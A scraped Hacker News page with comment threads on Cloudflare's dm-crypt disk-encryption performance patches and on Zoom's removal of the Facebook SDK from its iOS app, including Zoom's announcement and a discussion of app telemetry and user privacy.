(sadly, being single-block-at-a-time and constant time without hardware acceleration has a significant performance cost! ... better could be done for XTS mode, as the above algorithm could run SIMD using SSE2-- it isn't implemented in that implementation because the intended use was CBC mode which can't be parallelized like that)

Can't the kernel aes-ni just be setup to save the fpu registers itself on the stack, if necessary?

nemo1618(3850) 3 days ago [-]

I wish the world could move on from AES. We have ciphers that are nearly as fast without requiring specialized hardware, just generic SIMD. Imagine how fast a ChaCha ASIC could run!

There are other options for non-AES FDE too: most infamously Speck (suspected to be compromised by the NSA), but also Adiantum, which is now in Linux 5.0.

harikb(3708) 3 days ago [-]

Curious why CF needs to worry about side-channel attacks when all software run on those machines belong to / written by them. They do have a "workers" product with 3rd party code but they can easily keep storage servers out of that pool. Typically storage encryption is all about what happens when a machine is physically stolen, hard disk discarded on failure or other such actions beyond network security. Please correct me if I am wrong.

nshepperd(10000) 3 days ago [-]

> Which is obviously not constant time, and will leak information through cache/timing sidechannels.

This confuses me. Why is it in the kernel if it's not constant time? Isn't that a security risk? (Is there any context where it would be safe to invoke this?)

gruez(3847) 3 days ago [-]

>Which is obviously not constant time, and will leak information through cache/timing sidechannels.

What's the threat model here? I can't think of a plausible scenario where side channel attacks can be used to gain unauthorized access to FDE contents.

beagle3(2793) 3 days ago [-]

Ages ago I benchmarked truecrypt overhead on my machine at the time (2006, I think?) and it was about 3%; I assumed that's a reasonable and still applicable number, also do dm-crypt and modern VeraCrypt. Guess I was get gradually more wrong through those years, according to the git archeology....

singlow(4330) 3 days ago [-]

Also, disk speed in 2006 was probably much slower. Disks have gotten faster at a greater pace than processors during the last 10 years.

vletal(4131) 3 days ago [-]

Has anyone already tried to compile the kernel with these patches for their desktop/laptop with encrypted drive? https://github.com/cloudflare/linux/tree/master/patches

asymptotically2(10000) 3 days ago [-]

Yes, I'm running them on kernel 5.5.13 (which came out today)

tbrock(1925) 3 days ago [-]

Any chance of this patch making it to the mainline kernel?

saagarjha(10000) 3 days ago [-]

Not this one, specifically, but they've mentioned that they're working on upstreaming some derivative patches.

vbezhenar(3839) 3 days ago [-]

Offtopic, but why am I getting two scrollbars on this website? This is weird.

zackbloom(1428) 3 days ago [-]

Hi, I work on the Cloudflare Blog, we're working on deploying a fix now.

tyingq(4287) 3 days ago [-]

There is a scrollable div, the one that leads with:

grep -A 11 'xts(aes)' /proc/crypto

Is that what you mean?

tyingq(4287) 3 days ago [-]

The blog post reads like this all happened recently, but their linked post to the dm-crypt mailing list is from September 2017[1]. I'm curious if they've interacted with the dm-crypt people more recently.

[1]https://www.spinics.net/lists/dm-crypt/msg07516.html

mattst88(10000) 3 days ago [-]

Yeah, the time frame is somewhat unclear. The patch they link to in their tree is dated December 2019 however [1], so I assume this blog post is about stuff they've completed recently.

[1] https://github.com/cloudflare/linux/blob/master/patches/0023...

floatboth(4340) 3 days ago [-]

> Data encryption at rest is a must-have for any modern Internet company

What is it protecting against — data recovery from discarded old disks? Very stupid criminals breaking into the datacenter, powering servers off and stealing disks?

A breach in some web app would give the attacker access to a live system that has the encrypted disks already mounted...

eastdakota(1862) 3 days ago [-]

As we push further and further to the edge — closer and closer to every Internet user — the risk of a machine just walking away becomes higher and higher. As a result, we aim to build our servers with a similar mindset to how Apple builds iPhones — how can we ensure that secrets remain safe even if someone has physical access to the machines themselves. Ignat's work here is critical to us continuing to build our network to the furthest corners of the Internet. Stay tuned for more posts on how we use Trusted and Secure Boot, TPMs, signed packages, and much more to give us confidence to continue to expand Cloudflare's network.

zzzcpan(3749) 3 days ago [-]

On top of what others have said it protects, for example, from governments of all countries you have servers in and their law enforcement coming in taking the servers, extracting keys for mitm, installing malware and backdoors, placing some child porn on the servers, etc., from staff from various companies in various countries that maintains and deploys the infrastructure or just has access to it doing similar nasty things, and so on.

enitihas(3534) 3 days ago [-]

I think mostly against breach in datacenter security. Most competent companies already have policies on how to deal with discarded old disks. The one that don't have might not be competent enough to use encryption on rest too.

It's all about layers of defenses.

mercora(4290) 3 days ago [-]

being able to purge old disks confidently in a secure manner is a upside huge enough to make this statement true in my opinion. There have been numerous incidents even involving companies specializing in securely purging disks. If your data is encrypted there is basically nothing to do you could even outright sell those from your DC or something. Just delete the keys/headers from the disk and you are safe.

Its also not possible to get data injected offline into your filesystem without having the keys. Without encryption you could just get the disk of the targeted server running somewhere and set your implants or what you have. When the server sees the disk back up it looks just like a hiccup or something.

toolslive(10000) 3 days ago [-]

encrypted data at rest allows you to do an instant erase of the device.

derefr(3807) 3 days ago [-]

Yes, the former. You can't just put SSDs through a degausser!

netcoyote(10000) 3 days ago [-]

> criminals breaking into the datacenter, powering servers off and stealing disks?

Yes, exactly. A company I worked for had a hard drive pulled from a running server in a (third party) data center that contained their game server binaries. Shortly afterwards as pirate company setup a business running "gray shards", with - no surprise - lower prices.

pmorici(2254) 3 days ago [-]

Interesting. One other thing they don't mention that I found interesting when doing my own digging on dmcrypt speeds a while back is that the 'cryptosetup benchmark' command is only showing the single core performance of each of those encryption algorithms. You can verify this by watching the processor load as it performs the benchmark. That lead me to find that if you have a Linux software RAID you can get much better performance by having 1 dmcrpyt volume per disk and then software RAID the dm devices instead of putting a single dmcrypt on top of the software RAID. Curious if that would stack performance wise with what they found here or if that just happened to help with the queuing issue they identified.

mercora(4290) 3 days ago [-]

i remember somewhat recently efforts to parallelize the work of dm-crypt where applicable had been merged. However, i guess having multiple separate encryption parameters and states (read: disks) leaves more opportunity for parallelization of the work especially if disk access patterns are not spread wide enough.

lidHanteyk(10000) 3 days ago [-]

As usual, Cloudflare wants to pretend that they are community players, but they aren't. If they weren't hypocrites, then they'd submit their patches like [0] for upstream review, but they haven't. (I searched LKML.) I understand the underlying desire, which is to avoid using a queue for CPU-bound work that could be done immediately, but there doesn't appear to have been any serious effort to coordinate with other Linux contributors to figure out a solution to the problem.

[0] https://github.com/cloudflare/linux/blob/master/patches/0024...

manigandham(779) 3 days ago [-]

They are submitting their work, after they put in even more work to make it more universally applicable to all Linux users. They also did try to engage with the community who basically told them that they didn't know how fast crypto should be.

Majromax(10000) 3 days ago [-]

The article discusses this in the conclusion:

> We are going to submit this work for inclusion in the main kernel source tree, but most likely not in its current form. Although the results look encouraging we have to remember that Linux is a highly portable operating system: it runs on powerful servers as well as small resource constrained IoT devices and on many other CPU architectures as well. The current version of the patches just optimises disk encryption for a particular workload on a particular architecture, but Linux needs a solution which runs smoothly everywhere.

That is, they think their current patch is too specialized for their own use-case to warrant inclusion in the mainline kernel without significant adaptation.

marcinzm(10000) 3 days ago [-]

>but there doesn't appear to have been any serious effort to coordinate with other Linux contributors to figure out a solution to the problem.

Well when they reached out to the community they were told they're idiots and should f* off in only somewhat nicer language. Then they were simply ignored.

When your community is toxic don't complain that people don't want to be part of it.

herpderperator(4119) 2 days ago [-]

> Unlike file system level encryption it encrypts all data on the disk including file metadata and even free space.

Anyone have a source on how full disk aka block-level encryption encrypts free space? The only way I can imagine this could happen is by overwriting the entire disk initially with random data, so that you can't distinguish between encrypted and true 'free space', i.e. on a brand new clean disk. Then, when a file (which, when written, would have been encrypted) is deleted (which by any conventional meaning of the word 'deleted' means the encrypted data is still present, but unallocated, thus indistinguishable from the random data in step 1), then gets overwritten again with random data?

I would argue that overwriting an encrypted file with random data isn't really encrypting free space, but rather just overwriting the data, which already appeared random/encrypted. It is hardly any different to having a cleartext disk and overwriting deleted files with zeros, making them indistinguishable from actual free space.

dlgeek(2816) 2 days ago [-]

Debian does the first thing you discussed if you create an encrypted partition in the installer - it writes 0s through the crypto layer to fill the entire disk with encrypted data.

koala_man(4312) 2 days ago [-]

The point of encrypting free space is just so you can't say how full the drive is.

This way, an attacker can't focus cracking on the fullest disk, match stolen backup disks to hosts based on non-sensitive health metrics, etc.

>The only way I can imagine this could happen is by overwriting the entire disk initially with random data

Traditionally, for speed, you'd write all zeroes to the encrypted volume (causing the physical volume to appear random), but yes

>Then, when a file (which, when written, would have been encrypted) is deleted

You'd just leave it. Crucially, you don't TRIM it.

>I would argue that overwriting an encrypted file with random data isn't really encrypting free space

Yup, that's why it's not done

unixhero(3904) 3 days ago [-]

Did they reach out to the Linux kernel mailing list? Or just the dm-crypt team, I found the answer they received rather arrogant and useless to be honest.

jlgaddis(3000) 3 days ago [-]

I'm a huge 'fan' of F/OSS but, unfortunately, such condescending answers are all too common in this 'community'.

est31(3611) 3 days ago [-]

Wow those speed improvements are very neat. And an awesome blog post accompanying them. Prior to reading this, I've considered Linux disk encryption adding negligible latency because no HDDs/SSD can be fast enough for a CPU equipped with AES-NI, but that view has changed. Two questions: 1. are there any efforts to upstream them? 2. Invoking non-hw-accelerated AES decryption routines sounds quite expensive. Has it been tried out to save the FPU registers only if there is the need for decryption?

andyjpb(2927) 3 days ago [-]

The existing Linux system is useful for hardware that does less than 200MB/s, so you should be fine with HDDs.

Cloudflare is optimising for SSDs.

They don't talk about latency: all their crypto benchmarks measure throughput. Near the end they hint at response time for their overall cache system but there's no detailed discussion of latency issues.

The takeaway for me is that I'm OK with what's currently in Linux for the HDDs I use for my backups but I'd probably lose out if I encrypted my main SSD with LUKS.

At the end of the article they say that they're not going to upstream the patches as they are because they've only tested them with this one workload.

I'd also be interested to see a benchmark comparing SW AES with FPU-saving + HW AES. Unfortunately their post does not include stats for how often their proxy falls into the HW or SW implementations. Whatever those numbers are, I'd expect FPU-saving + HW AES to be somewhere in the middle.

knorker(10000) 3 days ago [-]

At least your first question is answered in the article: Yes

thereyougo(3076) 3 days ago [-]

>Being desperate we decided to seek support from the Internet and posted our findings to the dm-crypt mailing list

When I see a company such as CloudFlare being so transparent about their difficulties, and trying to find an answer using their community members, it makes me love them even more.

No ego, pure Professionalism

peterwwillis(2691) 3 days ago [-]

You won't know about their ego or professionalism until you work with them. Posting on a mailing list and making a blog post about it is not proof of either of these, it's brand marketing. They're trumpeting their engineering talent to build good will/nerd rep so people will love their company, spend money there, and apply for jobs. (But what it does show is that they're good at marketing, because it's working)

sneak(2447) 3 days ago [-]

Correspondingly, the response they received reflects just as strongly on the community itself.

thedance(10000) 3 days ago [-]

All this seems to me a series of very strong arguments for doing the crypto in your application.

saagarjha(10000) 3 days ago [-]

That would be even slower and more complex.

dependenttypes(10000) 3 days ago [-]

> one can only encrypt the whole disk with a single key

You can still use partitions.

> not all cryptographic algorithms can be used as the block layer doesn't have a high-level overview of the data anymore

I do not really understand this. Which cryptographic algorithms can't be used?

> Most common algorithms require some sort of block chaining to be secure

Nowadays I would say that from these only CTR is common, which does not require chaining.

> Application and file system level encryption are usually the preferred choice for client systems because of the flexibility

One big issue with 'Application and file system level encryption' is that you often end up leaking metadata (such as the date edited, file name, file size, etc).

Regardless I think that this is a really nice article. I can't wait to try their patches on my laptop.

steerablesafe(10000) 3 days ago [-]

> One big issue with 'Application and file system level encryption' is that you often end up leaking metadata (such as the date edited, file name, file size, etc).

I wonder how cryfs stacks up in this regard.

https://www.cryfs.org

richardwhiuk(4339) 3 days ago [-]

> I do not really understand this. Which cryptographic algorithms can't be used?

CBC - which is one the most common stream cipher algorithm.

It's not clear me whether GCM would work or not.

nemo1618(3850) 3 days ago [-]

> Which cryptographic algorithms can't be used?

You can't use any algorithm that requires O(n) IVs (e.g. a separate IV per disk sector), because there's nowhere to store the IVs. (Another consequence of this is that you can't store checksums anywhere, so you can't provide integrity checks.)

You can't use CTR mode either, because you'll end up reusing counter values. What do you do when you need to overwrite a block with new data?

XTS mode solves this, at least partially. It's like CTR mode, but with an extra 'tweak' that essentially hashes the block's content into the encryption key. So if you overwrite a block with new data, you get a new encryption key.

This isn't perfect, though, because it's still deterministic. If an attacker can see multiple states of the disk, they can tell when you revert a block to a previous state. But it's much better than other modes, especially since the main threat you want to protect against is your laptop getting stolen (in which case the attacker only sees a single state).

ggregoire(2275) 3 days ago [-]

> Many companies, however, don't encrypt their disks, because they fear the potential performance penalty caused by encryption overhead.

There is also the overhead of automatically unblocking a remote server during an unattended reboot. Reading the encryption password on a USB stick or fetching it through internet is a no from me. I think there are solutions about storing the password in RAM or in an unencrypted partition, but that's the overhead I'm talking about. I wonder how companies deal with that.

jlgaddis(3000) 3 days ago [-]

Red Hat's solution to this problem is NBDE.

> The Network-Bound Disk Encryption (NBDE) allows the user to encrypt root volumes of hard drives on physical and virtual machines without requiring to manually enter a password when systems are restarted. [0]

[0]: https://access.redhat.com/documentation/en-US/Red_Hat_Enterp...

r1ch(4022) 2 days ago [-]

Debian offers a dropbear shell in initramfs which you can use to SSH in and provide keys. I only have a handful of servers so currently I do this manually on a reboot but it would not be difficult to automate using for example SSH keys unlocking key material. The downside of this is your initramfs and kernel are on an unencrypted disk so a physical attacker could feasibly backdoor them. I'm sure there's some secure boot UEFI / TPM solution here.

gruez(3847) 3 days ago [-]

Isn't this what TPMs are designed for? I think both intel and amd motherboards have them built-in by using the security processor in the CPU.

mercora(4290) 3 days ago [-]

i use kexec for reboots and store the keys for disks inside an initramfs which itself is stored on an encrypted boot partition. When i do a cold boot these systems boot into a recovery like OS so i can fix stuff when needed but mainly to do a kexec there (its not perfect but what is). If its possible to avoid this (i.e. i have physical access) i can decrypt the initramfs directly from grub using a passphrase entered locally.

A warm reboot using kexec does not need any intervention from my side and directly boots into the already decrypted initramfs with the key already present and thus able to mount the encrypted volumes including the root volume.

LinuxBender(142) 3 days ago [-]

Does CloudFlare plan to get their kernel patches merged upstream?

yalooze(4298) 3 days ago [-]

Second to last paragraph:

> We are going to submit this work for inclusion in the main kernel source tree, but most likely not in its current form. Although the results look encouraging we have to remember that Linux is a highly portable operating system: it runs on powerful servers as well as small resource constrained IoT devices and on many other CPU architectures as well. The current version of the patches just optimises disk encryption for a particular workload on a particular architecture, but Linux needs a solution which runs smoothly everywhere.




(469) Zoom's Use of Facebook's SDK in iOS Client

469 points about 13 hours ago by patrickyevsukov in 10000th position

blog.zoom.us | Estimated reading time – 2 minutes | comments | anchor

Zoom's Use of Facebook's SDK in iOS Client

Zoom takes its users' privacy extremely seriously. We would like to share a change that we have made regarding the use of Facebook's SDK.

We originally implemented the "Login with Facebook" feature using the Facebook SDK for iOS (Software Development Kit) in order to provide our users with another convenient way to access our platform. However, we were made aware on Wednesday, March 25, 2020, that the Facebook SDK was collecting device information unnecessary for us to provide our services. The information collected by the Facebook SDK did not include information and activities related to meetings such as attendees, names, notes, etc., but rather included information about devices such as the mobile OS type and version, the device time zone, device OS, device model and carrier, screen size, processor cores, and disk space.

Our customers' privacy is incredibly important to us, and therefore we decided to remove the Facebook SDK in our iOS client and have reconfigured the feature so that users will still be able to log in with Facebook via their browser. Users will need to update to the latest version of our application that's already available at 2:30 p.m. Pacific time on Friday, March 27, 2020, in order for these changes to take hold, and we strongly encourage them to do so.

Example information sent by the SDK on installation and application open and close:

  • Application Bundle Identifier
  • Application Instance ID
  • Application Version
  • Device Carrier
  • iOS Advertiser ID
  • iOS Device CPU Cores
  • iOS Device Disk Space Available
  • iOS Device Disk Space Remaining
  • iOS Device Display Dimensions
  • iOS Device Model
  • iOS Language
  • iOS Timezone
  • iOS Version
  • IP Address

We would like to thank Joseph Cox from Motherboard for bringing this to our attention here.

We sincerely apologize for the concern this has caused, and remain firmly committed to the protection of our users' privacy. We are reviewing our process and protocols for implementing these features in the future to ensure this does not happen again.




All Comments: [-] | anchor

Executor(10000) about 11 hours ago [-]

Archive link to not give anti-white Vice ad money: https://web.archive.org/web/20200328020512/https://www.vice.....

exhilaration(10000) about 11 hours ago [-]

anti-white? can you explain?

intopieces(4339) about 12 hours ago [-]

I'd like this to be independently verified. There were a lot of comments on the other threads that 'Of course Zoom was sending data to Facebook' because they're using Facebook's SDK. It made it seem like such data leaks were inevitable, when apparently they aren't.

mroche(3504) about 12 hours ago [-]

From the article:

> Motherboard downloaded the update and verified that it does not send data to Facebook upon opening.

Edit: Fixing mental hiccup, nothing to see here.

greggman3(10000) about 1 hour ago [-]

I'm happy the Zoom doesn't want to help Facebook spy on me. Unfortunately the chosen solution is still a privacy nightmare. Basically they let you login to Facebook via an in app browser. The problem is an app can spy on all activity of an in app browser. That means you have to trust that Zoom is not recording your facebook password as you type it in. We need a better system.

Also scary. I have never ever logged in to Facebook on my iPhone except via the Facebook app and it was the first time I've installed Zoom. When I went into the Zoom app and picked login via Facebook, somehow it knew who I was and asked if I wanted to login as me. How is this possible? Is iOS sharing cookies across apps? I feel like maybe I need to reset my phone. WTF

I also feel like the best solution for this case is to somehow login via the facebook app. I know that used to be an option but it seems facebook deprecated it. My argument would be (a) I don't have to worry Zoom (or any other app) is getting my Facebook credentials (b) If actually do want to login via Facebook it's almost guaranteed I have the app installed.

codesternews(2667) 29 minutes ago [-]

Not in iOS. If they are using with webview or safariviewcontroller they can not access the browser cookies or data or most of device information.

generalpf(10000) 15 minutes ago [-]

If they're using ASWebAuthenticationController you can't read passwords. You can't even see which URL they're on.

mkchoi212(4323) about 10 hours ago [-]

That is ridiculous that a company as big as Zoom wouldn't know what an API they're using is doing with their customer's data. Is there not a legal/privacy team at Zoom that is in charge of reading all the fine prints and license agreements??

xiphias2(10000) about 10 hours ago [-]

I guess you haven't worked at a big company yet.

For me this would be much stranger at a tiny company.

mikenew(3957) about 10 hours ago [-]

So it sounds like Zoom was using the Facebook SDK, and now they're not.

I've been and iOS developer for a long time. I can tell you from experience that everyone does this. I have never worked for anyone who didn't ask for their app to include some combination of Facebook, Google, Flurry, AppCenter, Segment, Intercom, Parse, or whatever other random analytics framework the PM happens to be infatuated with.

Getting mad at Zoom for using the Facebook SDK is missing the point. They and a million others are always going to be doing this. Get mad at Apple for not letting you wireshark your own iPhone. Or having no way to package open source software where you can actually see what's running. As long as you're running binary blobs that can make whatever network connections they please, people are going to take your data and send it to places you don't know about.

Yeah maybe you can pass laws about it. But is that really a great solution? Who audits that? How do you determine what's legal and what's not? We should be pushing for a platform that makes it obvious what the software you're running is up to. The random pitchfork crusade against whatever company happens to catch a bad news cycle just isn't going to get us anywhere.

_trampeltier(4340) about 5 hours ago [-]

But there could be a law, Apps have to have an option to write all telemetric data to a text file.

tbodt(2683) about 6 hours ago [-]

Get mad at Facebook for stuffing analytics into their login button library

crtlaltdel(4179) about 9 hours ago [-]

yeah same here, on web and mobile this is super common. i just went through this with a PM.

rpastuszak(4338) about 4 hours ago [-]

> As long as you're running binary blobs that can make whatever network connections they please, people are going to take your data and send it to places you don't know about.

PWAs could answer this problem, at least to some extent, but Apple historically has been limiting the features to protect the AppStore and the Apple Tax (v. the recent local persistence changes in ITP).

It's better than, say, Google pretending that third-party cookies make the web a safer place (yup, that happened).

(Don't get me wrong, I think ITP and Safari are great)

> Get mad at Apple for not letting you wireshark your own iPhone.

People on HN can, but an average user shouldn't have to care about that. I'm 100% up for stronger legislative measures (both tech and dark UX patterns) and more education in this area. Sounds boring, but without it we'll just keep running in circles.

PrettyPastry(10000) 39 minutes ago [-]

You can listen to the iPhone with wireshark using OWASP zap as a proxy.

StreamBright(2810) about 4 hours ago [-]

>> I can tell you from experience that everyone does this.

This is not true and even if it was true it is an extremely lame argument. You can justify pretty much everything with this logic.

jka(4309) about 3 hours ago [-]

When you say 'everyone' in your second paragraph, really you mean 'all of the Silicon Valley style employers I'm aware of'.

That's a tiny proportion of the user population and doesn't imply agreement or consent to the information the Facebook SDK shares. And even if it it did, it wouldn't automatically mean that it's an acceptable or good behaviour by those apps and Facebook.

Bringing widely-distributed privacy breaches to a wider audience's attention can help those users provide feedback regarding products and then allow them to select vendors who respect their values.

m463(10000) 28 minutes ago [-]

Nice to see someone who gets it.

Apple gives you no way to find what your phone is doing, and no way to prevent it from doing it.

They provide company sponsored 'controls' on what apps can do, which is about as useful as a factory alarm on a mid-80's car. Except with a modern twist, where they're the only ones capable of installing an alarm. (and imagine the alarm gives a free pass to apple)

The fact that they're starting in on MacOS and Little Snitch makes me think their platform isn't long for the world.

sigh. I do like arch linux.

Angostura(3775) about 5 hours ago [-]

> Getting mad at Zoom for using the Facebook SDK is missing the point. They and a million others are always going to be doing this. Get mad at Apple for not letting you wireshark your own iPhone.

But you've just said everyone does it and we shouldn't get mad at them - so we don't need wireshark, because it would simply confirm that everyone does it and we shouldn't get mad at them - right?

aaronbrager(4188) about 10 hours ago [-]

You can pretty easily see all the traffic on your own phone. You can even do it on device

https://apps.apple.com/us/app/charles-proxy/id1134218562

designcode(10000) about 10 hours ago [-]

You can easily see all traffic on your device, try Charles proxy.

intopieces(4339) about 10 hours ago [-]

>Getting mad at Zoom for using the Facebook SDK is missing the point.

It's really hard to believe this point given that... getting mad seems to have worked.

anyfoo(3731) about 7 hours ago [-]

Of course passing laws about that is a great solution. This is how society defines what is and what isn't acceptable behavior for corporations. Are you also typing up rallying paragraphs against laws that dictate how companies have to adhere to food safety? Would your suggestion then be to "get mad at Burger King for not allowing you to perform chemical tests in the restaurant"? "Everyone does it", like everyone used asbestos and lead pipes in the past?

angrygoat(2940) about 7 hours ago [-]

You obviously need be a highly technical user, but it ought to be fairly easy for most people here to run a packet capture on their phone: https://developer.apple.com/documentation/network/recording_...

nexuist(4119) about 9 hours ago [-]

I don't want to live in a world where my parents and grandparents are expected to pull up Wireshark to figure out if the app they're using will record their front camera without consent.

Blaming Zoom and FB is entirely acceptable here, it is their responsibility to keep my data private.

Blaming Apple? Why, when Zoom is on the Play Store as well?

https://play.google.com/store/apps/details?id=us.zoom.videom...

>As long as you're running binary blobs that can make whatever network connections they please, people are going to take your data and send it to places you don't know about.

Surely there are open source video chat solutions already? They haven't taken off for one simple reason: video hosting is expensive. It's quite literally one of the most intensive network activities you can partake in, rivaling torrenting.

It doesn't make sense economically to offer a video hosting platform without collecting income from it. Nor does it make sense to attempt a peer-to-peer solution knowing full well that one laggy peer wrecks the experience for everyone else.

It's a very hard problem.

Causality1(10000) about 7 hours ago [-]

Constantly having to be in a war against my own phone's operating system is exhausting. These days I absolutely refuse to buy any brand that makes me jump through hoops just to get root on my own silicon.

jtdev(4293) about 1 hour ago [-]

Don't blame the drunk driver, blame the auto manufacturer...

hyko(10000) about 7 hours ago [-]

Yes, we need laws against this and for the gatekeepers to be the enforcers. I used to think that individual choice would solve these problems, but it won't. Zoom et al are growing like a weed and we can't protect all our loved ones from this bullshit with individual action all of the time. There are some problems that require government action; I think the events of this year have demonstrated that clearly. Individually we are weak as water, but collectively we are embarrassingly powerful. Time to organise.

hamburglar(10000) about 5 hours ago [-]

I'm really liking Zoom's responses to incidents lately. Both this and the 'oops we implemented certain features by leaving a localhost webserver gaping open' fiasco fairly recently got extremely nimble responses from them, and the responses were absolutely the right thing to do. They could have hand-waved the http server away and claimed to have 'secured' it, and they could have hand-waved this away as 'standard practice', which, let's be frank, it almost certainly is. The fact that they understood the seriousness and swiftly yanked the features in both instances is HUGE. Kudos to them for this.

edit: some people won't want to give them any slack because they committed the offenses in the first place, but I think that's silly. Reward them for trying, because if this is the way they're going to respond to blowing it, they're one of the good guys.

marta_morena_23(10000) about 9 hours ago [-]

Baffling how this can be the top post...

'Who audits that?' We just did. And if there was a law against that, Zoom would just have been exposed for breaking it. Any sane company will try their best to adhere to laws. Some big players like Google can afford to mess around pay a few billions in fines, but those are the exceptions, not the rule. Eventually, even they can't afford to pay the fines in the long run (Even Google bowed to GDPR or at least its getting bashed with steeper fines until they wake up).

'How do you determine what's legal and what's not?' You pass a law, read the law? This is a self-contradiction. Laws are open for interpretation but the interpretation is quite clear after a supreme court case (for the better or worse).

'We should be pushing for a platform that makes it obvious what the software you're running is up to'. Oh the web of trust? Did you ever install Snitch or some other firewall on your system? Its utterly hopeless even if you are knowledgeable. There is simply not way to audit that. Who audits that? Here you CAN ask this question.

I can't for the life of me understand how you can believe that it is better for everyone, including parents and grandparents to audit their phone, instead of having researchers audit phones and report companies who break the law. This is non-nonsensical. You must either be some expert without a connection to the real world, or some elitist who thinks everyone is like him.

peteretep(1718) about 6 hours ago [-]

> Who audits that?

I'd like to see Apple launch their own telemetry/events framework, that users can examine the data from, and then cut off everyone else

HenryBemis(4292) about 1 hour ago [-]

Hello fellow iOS developer. I have two apps on the Apple store. I never used any external SDK/libraries, only the built-in Xcode ones. I preferred to spent a bit more time in writing/testing but I would never accept that FB and other scum (privacy standpoint) track children (I wrote the apps for my nephews and nieces and I put them in the Apple store just for them)(I don't advertise them at all and I won't do so here either).

Regarding the issue that started this Zoom-FB dialogue I have commented a dozen (or more) times on the necessity to have a firewalled phone that a user (unfortunately the user needs to have basic knowledge of firewall admin) can decide what to allow and what to block. Your point on who audits is valid (I am a CISA and CISM of many years), and, well, nobody does. Each user will have to do his/her own work/effort to keep their family clear of these scum.

pixelrevision(4340) less than a minute ago [-]

Another problem is these analytics platforms just keep getting worse. There used to be a lot of effort put in to not collecting any personally identifiable info. Hell even google analytics was strict about that. It also took time to integrate them.

Now almost all the packages grab identifiable info by default and some are doing things like making screen recordings. Combine that with a rotating set of product owners like described above and a lot of apps just end up making way too many calls to way too many places.

And I do think Apple could and should be doing something more here. Their developer analytics setup is a good example to lead by as it gives users a global option to opt out. They also are able to reject apps for an icon being offbrand so I'm pretty sure they could figure out something here.

saagarjha(10000) about 8 hours ago [-]

> Getting mad at Zoom for using the Facebook SDK is missing the point. They and a million others are always going to be doing this. Get mad at Apple for not letting you wireshark your own iPhone.

There's plenty of anger to go around. Get mad all all three: Facebook for making an SDK that tracks you, Zoom for integrating it, and Apple for letting it through unencumbered.

yingw787(3944) about 11 hours ago [-]

I love $ZM, it works when nothing else does, and it's responsive to user feedback and cares about user happiness. Most of the interactions I have today are through $ZM and my life would be cut off almost entirely if $ZM didn't exist. If I'm fortunate enough to run a company, I would love to have a business relationship with $ZM, and I'll remember all this.

No, I'm not a paid shill, just a really tired and stressed out guy who gets almost all of his social interaction through Zoom.

bunchOfCucks(10000) about 10 hours ago [-]

$OK

ccktlmazeltov(10000) about 12 hours ago [-]

And so zoom crumbled from the social pressure, while every other service and website is thinking 'oof, they didn't realize that everybody does this to do advertising'

floatingatoll(4062) about 11 hours ago [-]

It's also possible they didn't listen to their app over the wire and see it doing this. What lesson could we teach about 'why you should mitmproxy your app while it's in development?', so that people can start uncovering this in other apps — including their own?

thulecitizen(10000) about 11 hours ago [-]

Sometimes I really wonder who is on hackernews that stuff like this gets downvoted. Apparently a healthy dose of (scientific) skepticism means one is being 'rude' in SV circles. I guess the intellectual-property-rentier industrial complex that is Silicon Valley doesn't like people looking behind the curtains.

pixiemaster(10000) about 7 hours ago [-]

here, take my gold

jscholes(2970) about 12 hours ago [-]

So did they just... remove Facebook login? Doesn't seem that likely. Maybe the FB SDK has some flags you can set.

Operyl(4133) about 12 hours ago [-]

> 'We will be removing the Facebook SDK and reconfiguring the feature so that users will still be able to login with Facebook via their browser. ...'

It sounds like this they're just no longer flat out using the Facebook SDK (which provides a slightly more 'native' / 'nicer' login flow for apps when used). They're going to do what most (at least, from personal experience) apps do and just show a webview with a redirect back into the app, which doesn't call out to Facebook at all.

EDIT: That is, it doesn't call out to Facebook at all until you start the login flow, which is just opening a browser view to the oauth2 flows..

Hokusai(10000) about 10 hours ago [-]

To use the Facebook SDK is a rocky mistake. It includes all kind of telemetry that is send to Facebook, whenever the user is connected to Facebook or not.

In the company I worked for, they read the code, you have access to it, and stripped that parts. It's not much work but its a pain.

The best approach is to use just the HTTP APIs and ignore the SDK. Your team will better understand how Facebook works, your app will be lighter and you are free from nasty surprises that a 3rd party may add to your app without your knowledge.

mianos(10000) about 4 hours ago [-]

This is kind of exactly what they said it didn't do.

shbooms(10000) about 10 hours ago [-]

Headline should technically read:

'Zoom Removes Code That Sends Data to Facebook when you first open the app'

as per the article:

'Motherboard downloaded the update and verified that it does not send data to Facebook upon opening.'

It's a bit naive to just assume that just because they don't send the data right away, that it's not getting sent at some point later on.

noahtallen(10000) about 10 hours ago [-]

> we decided to remove the Facebook SDK in our iOS client and have reconfigured the feature so that users will still be able to log in with Facebook via their browser.

Since they removed the Facebook SDK entirely, whatever mechanism Facebook used to collect the info doesn't exist any more. Instead of being able to collect the data at all times, wouldn't FB only have a vector to do so through web login? At that point, I assume they could do fingerprinting in the browser to collect some info, but at least the cannot do it on the system level any more.

It still seems like this is a big improvement. Though, I imagine most folks will have at least one other app using the FB SDK, so it's not like the root cause is fixed.

narendranag(4342) about 10 hours ago [-]

Considering how many apps are using Facebook's SDK, shouldn't this be something that FB should be addressing? After all, they are the ones making an SDK available to app developers to help with user-login. Shouldn't the presumption of trust rest on FB?

designcode(10000) about 9 hours ago [-]

I can't see the big deal. We use the Facebook SDK specifically for the free analytics. It's just a default part of the SDK. It's not sending anything any other analytics package wouldn't

proactivesvcs(10000) about 10 hours ago [-]

If Zoom 'takes its users' privacy extremely seriously' and their 'customers' privacy is incredibly important' then why would they be releasing software without a strong knowledge of what third party code they're adding in, and what exfiltration might be happening as a result? They hold user privacy in such high regard and yet are releasing a program without even hooking it up to a network monitor for five minutes?

Someone's lying here.

squaresmile(10000) about 8 hours ago [-]

While I think one shouldn't read too much into PR statements like those, I don't think it's useless to call them out either, especially when they use very strong words like 'extremely seriously' and 'incredibly important'.

If the defense is the practice being common then there isn't anything special about Zoom regarding user privacy, is it.

ricardobeat(3649) about 10 hours ago [-]

This is absolutely common. Business will require tracking/authentication/etc, contracts will be signed, developers will implement the provided SDK. Nobody will inspect the data being sent.

> releasing a program without even hooking it up to a network monitor for five minutes

How many times have you seen anyone do that? Unfortunately that is the reality - my personal take is to simply try to avoid vendor libraries at all costs, but it's hard to sell.

holografix(3904) about 10 hours ago [-]

I for one don't think Zoom is being malicious here. I imagine plenty of other apps out there are doing the same right now, by naïvely making use of FBook's SDK.

anonu(2536) about 10 hours ago [-]

I noticed today that the mic was 'muted' on zoom. I chimed in on the video call I was on and the window flashed a reminder that I was 'muted'.

So clearly the mic itself is not muted - the software is still listening.

Not sure how I felt about that given all the recent Zoom privacy revelations.

